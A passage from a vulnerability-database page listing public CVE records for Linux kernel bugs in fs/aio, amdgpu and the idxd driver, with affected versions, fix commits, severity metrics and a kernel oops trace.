Affected: e7e23fc5d5fe422827c9a43ecb579448f73876c7 , < c01ed748847fe8b810d86efc229b9e6c7fafa01e (git)
Affected: 1dc7d74fe456944a9b1c57bd776280249f441ac6 , < 5c43d0041e3a05c6c41c318b759fff16d2384596 (git)
Affected: b820de741ae48ccf50dd95e297889c286ff4f760 , < 961ebd120565cb60cebe21cb634fbc456022db4a (git)

Linux

Affected: 4.19.308 , < 4.19.312 (semver)
Affected: 5.4.270 , < 5.4.274 (semver)
Affected: 5.10.211 , < 5.10.215 (semver)
Affected: 5.15.150 , < 5.15.154 (semver)
Affected: 6.1.80 , < 6.1.84 (semver)
Affected: 6.6.19 , < 6.6.24 (semver)
Affected: 6.7.7 , < 6.7.12 (semver)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35815",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:12:56.685850Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:42.531Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:47.505Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/10ca82aff58434e122c7c757cf0497c335f993f3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/396dbbc18963648e9d1a4edbb55cfe08fa374d50"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/94eb0293703ced580f05dfbe5a57da5931e9aee2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a71cba07783abc76b547568b6452cd1dd9981410"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/18d5fc3c16cc317bd0e5f5dabe0660df415cadb7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c01ed748847fe8b810d86efc229b9e6c7fafa01e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c43d0041e3a05c6c41c318b759fff16d2384596"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/961ebd120565cb60cebe21cb634fbc456022db4a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/aio.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "10ca82aff58434e122c7c757cf0497c335f993f3",
              "status": "affected",
              "version": "337b543e274fe7a8f47df3c8293cc6686ffa620f",
              "versionType": "git"
            },
            {
              "lessThan": "396dbbc18963648e9d1a4edbb55cfe08fa374d50",
              "status": "affected",
              "version": "b4eea7a05ee0ab5ab0514421e6ba8c5d249cf942",
              "versionType": "git"
            },
            {
              "lessThan": "94eb0293703ced580f05dfbe5a57da5931e9aee2",
              "status": "affected",
              "version": "ea1cd64d59f22d6d13f367d62ec6e27b9344695f",
              "versionType": "git"
            },
            {
              "lessThan": "a71cba07783abc76b547568b6452cd1dd9981410",
              "status": "affected",
              "version": "d7b6fa97ec894edd02f64b83e5e72e1aa352f353",
              "versionType": "git"
            },
            {
              "lessThan": "18d5fc3c16cc317bd0e5f5dabe0660df415cadb7",
              "status": "affected",
              "version": "18f614369def2a11a52f569fe0f910b199d13487",
              "versionType": "git"
            },
            {
              "lessThan": "c01ed748847fe8b810d86efc229b9e6c7fafa01e",
              "status": "affected",
              "version": "e7e23fc5d5fe422827c9a43ecb579448f73876c7",
              "versionType": "git"
            },
            {
              "lessThan": "5c43d0041e3a05c6c41c318b759fff16d2384596",
              "status": "affected",
              "version": "1dc7d74fe456944a9b1c57bd776280249f441ac6",
              "versionType": "git"
            },
            {
              "lessThan": "961ebd120565cb60cebe21cb634fbc456022db4a",
              "status": "affected",
              "version": "b820de741ae48ccf50dd95e297889c286ff4f760",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/aio.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4.19.312",
              "status": "affected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThan": "5.4.274",
              "status": "affected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThan": "5.10.215",
              "status": "affected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThan": "5.15.154",
              "status": "affected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThan": "6.1.84",
              "status": "affected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThan": "6.6.24",
              "status": "affected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThan": "6.7.12",
              "status": "affected",
              "version": "6.7.7",
              "versionType": "semver"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.19.308",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "5.4.270",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.10.211",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.15.150",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "6.1.80",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "6.6.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "6.7.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/aio: Check IOCB_AIO_RW before the struct aio_kiocb conversion\n\nThe first kiocb_set_cancel_fn() argument may point at a struct kiocb\nthat is not embedded inside struct aio_kiocb. With the current code,\ndepending on the compiler, the req-\u003eki_ctx read happens either before\nthe IOCB_AIO_RW test or after that test. Move the req-\u003eki_ctx read such\nthat it is guaranteed that the IOCB_AIO_RW test happens first."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:05:59.810Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/10ca82aff58434e122c7c757cf0497c335f993f3"
        },
        {
          "url": "https://git.kernel.org/stable/c/396dbbc18963648e9d1a4edbb55cfe08fa374d50"
        },
        {
          "url": "https://git.kernel.org/stable/c/94eb0293703ced580f05dfbe5a57da5931e9aee2"
        },
        {
          "url": "https://git.kernel.org/stable/c/a71cba07783abc76b547568b6452cd1dd9981410"
        },
        {
          "url": "https://git.kernel.org/stable/c/18d5fc3c16cc317bd0e5f5dabe0660df415cadb7"
        },
        {
          "url": "https://git.kernel.org/stable/c/c01ed748847fe8b810d86efc229b9e6c7fafa01e"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c43d0041e3a05c6c41c318b759fff16d2384596"
        },
        {
          "url": "https://git.kernel.org/stable/c/961ebd120565cb60cebe21cb634fbc456022db4a"
        }
      ],
      "title": "fs/aio: Check IOCB_AIO_RW before the struct aio_kiocb conversion",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35815",
    "datePublished": "2024-05-17T13:23:20.326Z",
    "dateReserved": "2024-05-17T12:19:12.343Z",
    "dateUpdated": "2025-05-04T09:05:59.810Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26922 (GCVE-0-2024-26922)

Vulnerability from cvelistv5 – Published: 2024-04-23 13:05 – Updated: 2025-11-04 17:14

Title

drm/amdgpu: validate the parameters of bo mapping operations more clearly

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate the parameters of bo mapping operations more clearly Verify the parameters of amdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d4da6b084f1c56259…
	https://git.kernel.org/stable/c/f68039375d4d6d673…
	https://git.kernel.org/stable/c/1fd7db5c16028dc07…
	https://git.kernel.org/stable/c/8b12fc7b032633539…
	https://git.kernel.org/stable/c/212e3baccdb193960…
	https://git.kernel.org/stable/c/ef13eeca7c79136bc…
	https://git.kernel.org/stable/c/b1f04b9b1c5317f56…
	https://git.kernel.org/stable/c/6fef2d4c00b5b8561…

Impacted products

Vendor

Product

Version

Linux

Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < d4da6b084f1c5625937d49bb6722c5b4aef11b8d (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < f68039375d4d6d67303674c0ab2d06b7295c0ec9 (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < 1fd7db5c16028dc07b2ceec190f2e895dddb532d (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < 8b12fc7b032633539acdf7864888b0ebd49e90f2 (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < 212e3baccdb1939606420d88f7f52d346b49a284 (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < ef13eeca7c79136bc38e21eb67322c1cbd5c40ee (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < b1f04b9b1c5317f562a455384c5f7473e46bdbaa (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < 6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75 (git)

Linux

Affected: 4.12
Unaffected: 0 , < 4.12 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:14:43.597Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d4da6b084f1c5625937d49bb6722c5b4aef11b8d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f68039375d4d6d67303674c0ab2d06b7295c0ec9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1fd7db5c16028dc07b2ceec190f2e895dddb532d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b12fc7b032633539acdf7864888b0ebd49e90f2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/212e3baccdb1939606420d88f7f52d346b49a284"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ef13eeca7c79136bc38e21eb67322c1cbd5c40ee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b1f04b9b1c5317f562a455384c5f7473e46bdbaa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26922",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:46:55.644106Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:15.988Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d4da6b084f1c5625937d49bb6722c5b4aef11b8d",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "f68039375d4d6d67303674c0ab2d06b7295c0ec9",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "1fd7db5c16028dc07b2ceec190f2e895dddb532d",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "8b12fc7b032633539acdf7864888b0ebd49e90f2",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "212e3baccdb1939606420d88f7f52d346b49a284",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "ef13eeca7c79136bc38e21eb67322c1cbd5c40ee",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "b1f04b9b1c5317f562a455384c5f7473e46bdbaa",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.12"
            },
            {
              "lessThan": "4.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: validate the parameters of bo mapping operations more clearly\n\nVerify the parameters of\namdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:59:46.556Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d4da6b084f1c5625937d49bb6722c5b4aef11b8d"
        },
        {
          "url": "https://git.kernel.org/stable/c/f68039375d4d6d67303674c0ab2d06b7295c0ec9"
        },
        {
          "url": "https://git.kernel.org/stable/c/1fd7db5c16028dc07b2ceec190f2e895dddb532d"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b12fc7b032633539acdf7864888b0ebd49e90f2"
        },
        {
          "url": "https://git.kernel.org/stable/c/212e3baccdb1939606420d88f7f52d346b49a284"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef13eeca7c79136bc38e21eb67322c1cbd5c40ee"
        },
        {
          "url": "https://git.kernel.org/stable/c/b1f04b9b1c5317f562a455384c5f7473e46bdbaa"
        },
        {
          "url": "https://git.kernel.org/stable/c/6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75"
        }
      ],
      "title": "drm/amdgpu: validate the parameters of bo mapping operations more clearly",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26922",
    "datePublished": "2024-04-23T13:05:04.243Z",
    "dateReserved": "2024-02-19T14:20:24.194Z",
    "dateUpdated": "2025-11-04T17:14:43.597Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35989 (GCVE-0-2024-35989)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:47 – Updated: 2025-05-04 09:10

Title

dmaengine: idxd: Fix oops during rmmod on single-CPU platforms

Summary

In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: Fix oops during rmmod on single-CPU platforms During the removal of the idxd driver, registered offline callback is invoked as part of the clean up process. However, on systems with only one CPU online, no valid target is available to migrate the perf context, resulting in a kernel oops: BUG: unable to handle page fault for address: 000000000002a2b8 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 1470e1067 P4D 0 Oops: 0002 [#1] PREEMPT SMP NOPTI CPU: 0 PID: 20 Comm: cpuhp/0 Not tainted 6.8.0-rc6-dsa+ #57 Hardware name: Intel Corporation AvenueCity/AvenueCity, BIOS BHSDCRB1.86B.2492.D03.2307181620 07/18/2023 RIP: 0010:mutex_lock+0x2e/0x50 ... Call Trace: <TASK> __die+0x24/0x70 page_fault_oops+0x82/0x160 do_user_addr_fault+0x65/0x6b0 __pfx___rdmsr_safe_on_cpu+0x10/0x10 exc_page_fault+0x7d/0x170 asm_exc_page_fault+0x26/0x30 mutex_lock+0x2e/0x50 mutex_lock+0x1e/0x50 perf_pmu_migrate_context+0x87/0x1f0 perf_event_cpu_offline+0x76/0x90 [idxd] cpuhp_invoke_callback+0xa2/0x4f0 __pfx_perf_event_cpu_offline+0x10/0x10 [idxd] cpuhp_thread_fun+0x98/0x150 smpboot_thread_fn+0x27/0x260 smpboot_thread_fn+0x1af/0x260 __pfx_smpboot_thread_fn+0x10/0x10 kthread+0x103/0x140 __pfx_kthread+0x10/0x10 ret_from_fork+0x31/0x50 __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 <TASK> Fix the issue by preventing the migration of the perf context to an invalid target.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9edd3aa34d50f27b9…
	https://git.kernel.org/stable/c/023b6390a15a98f9c…
	https://git.kernel.org/stable/c/f976eca36cdf94e32…
	https://git.kernel.org/stable/c/47533176fdcef17b1…
	https://git.kernel.org/stable/c/f221033f5c24659dc…

Impacted products

Vendor

Product

Version

Linux

Affected: 81dd4d4d6178306ab31db91bdc7353d485bdafce , < 9edd3aa34d50f27b97be30b2ba4a6af0945ff56b (git)
Affected: 81dd4d4d6178306ab31db91bdc7353d485bdafce , < 023b6390a15a98f9c3aa5e7da78d485d5384a08e (git)
Affected: 81dd4d4d6178306ab31db91bdc7353d485bdafce , < f976eca36cdf94e32fa4f865db0e7c427c9aa33c (git)
Affected: 81dd4d4d6178306ab31db91bdc7353d485bdafce , < 47533176fdcef17b114a6f688bc872901c1ec6bb (git)
Affected: 81dd4d4d6178306ab31db91bdc7353d485bdafce , < f221033f5c24659dc6ad7e5cf18fb1b075f4a8be (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35989",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-18T14:45:11.314988Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-31T17:16:21.185Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.512Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9edd3aa34d50f27b97be30b2ba4a6af0945ff56b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/023b6390a15a98f9c3aa5e7da78d485d5384a08e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f976eca36cdf94e32fa4f865db0e7c427c9aa33c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/47533176fdcef17b114a6f688bc872901c1ec6bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f221033f5c24659dc6ad7e5cf18fb1b075f4a8be"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma/idxd/perfmon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9edd3aa34d50f27b97be30b2ba4a6af0945ff56b",
              "status": "affected",
              "version": "81dd4d4d6178306ab31db91bdc7353d485bdafce",
              "versionType": "git"
            },
            {
              "lessThan": "023b6390a15a98f9c3aa5e7da78d485d5384a08e",
              "status": "affected",
              "version": "81dd4d4d6178306ab31db91bdc7353d485bdafce",
              "versionType": "git"
            },
            {
              "lessThan": "f976eca36cdf94e32fa4f865db0e7c427c9aa33c",
              "status": "affected",
              "version": "81dd4d4d6178306ab31db91bdc7353d485bdafce",
              "versionType": "git"
            },
            {
              "lessThan": "47533176fdcef17b114a6f688bc872901c1ec6bb",
              "status": "affected",
              "version": "81dd4d4d6178306ab31db91bdc7353d485bdafce",
              "versionType": "git"
            },
            {
              "lessThan": "f221033f5c24659dc6ad7e5cf18fb1b075f4a8be",
              "status": "affected",
              "version": "81dd4d4d6178306ab31db91bdc7353d485bdafce",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma/idxd/perfmon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
